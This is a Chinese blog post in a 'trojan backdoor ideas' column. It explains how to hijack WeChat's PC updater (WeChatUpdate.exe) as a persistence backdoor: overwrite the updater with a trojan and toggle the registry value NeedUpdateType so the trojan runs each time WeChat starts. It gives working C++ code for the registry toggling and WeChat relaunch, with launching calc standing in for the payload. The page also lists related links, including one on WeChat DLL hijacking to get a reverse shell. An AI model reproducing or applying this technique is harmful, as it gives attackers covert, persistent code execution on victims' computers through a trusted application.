劫持WeChatUpdate.exe作为后门

最新推荐文章于 2024-02-05 16:36:48 发布
最新推荐文章于 2024-02-05 16:36:48 发布
阅读量7.2k 收藏 5
点赞数 1
分类专栏: 木马后门思路 文章标签: 后门 微信劫持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/103897116
版权

发现微信pc端在启动的时候,会检查注册表中的NeedUpdateType >= 100 就会先启动微信安装目录下的wechatupdate.exe

可以利用这个思路写个劫持微信更新程序的后门,具体思路如下:
1.释放木马到微信安装目录,覆盖WeChatUpdate.exe
2.写注册表修改NeedUpdateType=100
3.被攻击者下次启动微信时,检测到NeedUpdateType=100,就会先启动微信目录下的后门程序
4.后门程序启动后,先还原注册表NeedUpdateType=0,再启动微信主程序
5.微信主程序启动成功后,延迟5秒,再把NeedUpdateType=100,下次启动微信时,开始重复第三步

为什么要延迟5秒,因为WeChatUpdate.exe在启动wechat.exe后,wechat.exe会立马再次查询注册表,并启动WeChatUpdate.exe,导致死循环…

#include <iostream>
#include <windows.h>


VOID HijackingUpdate()
{
    HKEY hKey = NULL;
    DWORD lpData = 0;
    do
    {
        WinExec("calc", SW_SHOW);

        if (RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Tencent\\WeChat", 0, 0xF003Fu, &hKey) || 
            RegSetValueExW(hKey, L"NeedUpdateType", 0, REG_DWORD, (const byte*)&lpData, sizeof(DWORD))||
            RegFlushKey(hKey)||
            RegCloseKey(hKey))
        {
            break;
        }

        // 2.启动微信主程序
        WinExec("WeChat.exe", SW_SHOW);

       
        // 3. 重新设置注册表NeedUpdateType <= 100, 这样下次启动微信时,先启动当前后门程序
        Sleep(5000);
        lpData = 100;
        if (RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Tencent\\WeChat", 0, 0xF003Fu, &hKey) ||
            RegSetValueExW(hKey, L"NeedUpdateType", 0, REG_DWORD, (const byte*)&lpData, sizeof(DWORD)) ||
            RegFlushKey(hKey) ||
            RegCloseKey(hKey))
        {
            break;
        }

    } while (0);

}

#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
int main()
{
    HijackingUpdate();
}
FFE4
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[微信小程序] 最新HJmallV4.2.31独立版+小程序前端:完美去后门
u011714879的博客
02-15 1232
最新商城小程序V4.2.31独立版,已完美去除程序中的多个后门代码,带最新五端小程序全套插件:微信小程序+支付宝小程序+百度小程序+抖音小程序+头条小程序!支持自定义分销、首页diy、附近门店、门店卡券、首页魔方、专题电商、到店自提、到店核销、优惠券、积分、会员等级、电子面单打印、小票打印(365、易联云)、七牛储存、阿里oss储存、模板信息、短信通知、系统文章、视频专区、门店管理(门店列表+一键...
微信小程序启动自动检测版本更新,检测到新版本则提示更新updateManager
coderYYY的博客
07-03 2631
微信小程序启动自动检测版本更新,检测到新版本则提示更新updateManager。
WeChat-小程序-强制更新
书山有路_邓
04-22 1326
https://blog.csdn.net/jingjingshizhu/article/details/80050515 https://developers.weixin.qq.com/miniprogram/dev/api/UpdateManager.html 注意,小程序的更新的api需要基础库在1.9.90以上,需要使用的童鞋记得做兼容 1、在app.js的onLaunch方法中使用:...
WeChat.exe
11-24
微信 WeChat.exe 
微信DLL劫持反弹shell
per_se_veran_ce的博客
11-15 4477
劫持工具:BDF,https://github.com/cream492/the-backdoor-factory 任务管理工具:查找微信调用的DLL文件(ProcessExplorer),https://en.softonic.com/download/process-explorer/windows/post-download ...
保护自己的信息安全:微信后门关闭
qq_74457525的博客
01-15 553
做完以上步骤,就能在一定程度上防止微信对你信息的泄露,希望能帮到你。
【Windows】通过编辑注册表来配置自动更新
qq_48180611的博客
02-05 3672
因为系统长时间不能更新,我根据这份文件顺藤摸瓜找到了官网有关这部分注册表的说明以及问题反馈,在这里做一下备忘笔记。
解除映像劫持工具.exe
02-21
解除映像劫持工具可解决因映像劫持导致的程序不能运行问题 显示在红色列表框中为被劫持导致无法运行的程序名(同名程序不能在本机器上正常运行,可通过加号增加对其它程序文件的屏蔽) 显示在绿色列表框中为本...
DLL劫持生成器.exe
05-21
一键生成DLL文件函数。
hrkill-1.0.0.62.exe
07-14
查杀各类恶性顽固病毒扫描出来的可疑的东西火绒自动处理,特别是真的流氓浏览器持劫行为,2345浏览器的流氓行为,解决浏览器首页劫持类等病毒,解决例如“打不开页面”、“主页被篡改”、“网址不断刷新”等问题。...
AheadLib.exe,DLL劫持工具
12-28
AheadLib.exe DLL导出表,DLL劫持工具
浏览器被劫持木马查杀hrkill-1.0.0.50.exe
04-17
浏览器被劫持木马查杀hrkill-1.0.0.50
微信小程序的update使用的问题
weixin_47588909的博客
02-06 2118
微信小程序的update使用的问题 1、使用更新的时候,更新的item在数据库中必须有_openid 2、以上的只能自己更新自己,但不能更新别人的item(如点赞的时候只能给自己点赞才能成功) 3、解决的方法:使用update时直接在云函数中处理就不会出现2的问题 ...
wechaty+TypeChat:使用自然语言控制你的微信
coc_wechaty的博客
08-06 295
随着ChatGPT火爆,LLM应用如雨后春笋,层出不穷。几乎任何人都可以基于大预言模型开发出自己的天猫精灵、小爱同学、小度小度… 今天我将向大家介绍一个基于ChatGPT开发的使用自然语言控制微信方案。使用LLM控制wechaty机器人执行各种命令,wechaty+ TypeChat 的结合,已实现以下功能(完整代码查看type-wechaty https://github.com/at...
2020微信最新版---微信PC版2.9.0-WeChatSetup.exe
aeaxea43的博客
05-02 8831
最新版微信PC版 http://kk04.cn/f-6258.html
【系统白程序利用】werfault.exe
Sven的忘却日记
09-03 1885
#include "stdafx.h" #include &lt;windows.h&gt; int _tmain(int argc, _TCHAR* argv[]) { // Get root key handle. HKEY hRoot = nullptr; LPCTSTR lpSubKey = L"Software\\Microsoft\\Windows\\Wi...
关于版本更新的方案选择,强制更新以及提示更新
楚人无梦的专栏
06-19 3424
private void checkVersion() { HashMap&lt;String, String&gt; map = new HashMap&lt;&gt;(); map.put(Constant.VERSION, AppUtil.getApplicaionVersionName(mContext));// map.put("devi...
分包合同计量单.docx
最新发布
07-13
分包合同计量单.docx
360cse_12.0.1476.0.exe
07-24
### 回答1: 360cse_12.0.1476.0.exe 是一个可执行文件,属于360安全中心软件的安装程序。 360安全中心是一款综合性的安全软件,具有杀毒、清理、优化、防护等多种功能。该软件可以实时监测系统的安全状态,防止恶意软件的入侵和病毒的传播,保护用户的电脑免受各种网络威胁。 360cse_12.0.1476.0.exe 是该软件的安装文件,用户可以运行该文件来安装360安全中心软件。安装过程通常简单明了,用户只需按照软件提供的指引一步步操作即可完成安装。安装完成后,用户可以根据自己的需求进行相应的设置和调整,以达到最佳的安全保护效果。 360安全中心的功能非常强大,可以提供全面的安全保护和优化服务。它可以扫描和清理系统中的垃圾文件和无效注册表项,以提高计算机的运行速度和性能。同时,它还提供了实时的病毒和木马扫描功能,可以及时发现和清除潜在的威胁。此外,软件还提供了浏览器的保护功能,防止网页劫持和恶意插件的安装。 总之,360cse_12.0.1476.0.exe 是360安全中心软件的安装文件,安装后可以提供全面的安全保护和优化服务,帮助用户保护电脑免受各种威胁,并提高系统的运行性能。 ### 回答2: 360cse_12.0.1476.0.exe是一种可执行文件,属于360安全卫士软件的一个升级补丁文件。该文件的大小通常约为几十兆兆字节,可以在360安全卫士的官方网站或官方软件更新中心下载到。 这个文件的主要作用是更新360安全卫士软件的版本,修复一些已知的漏洞和问题,并提供一些新的功能和特性。安装这个升级补丁文件可以帮助用户保持软件的最新版本,提高软件的安全性和稳定性。 在安装过程中,用户只需双击该文件,按照提示完成安装即可。安装完成后,360安全卫士软件会自动重启,并应用新的版本和更新内容。 值得注意的是,在下载和安装这个文件时,需要确保所使用的文件来源可信,以避免下载和安装恶意软件。建议使用官方网站或官方软件更新中心下载软件升级补丁,并定期更新软件以保持系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值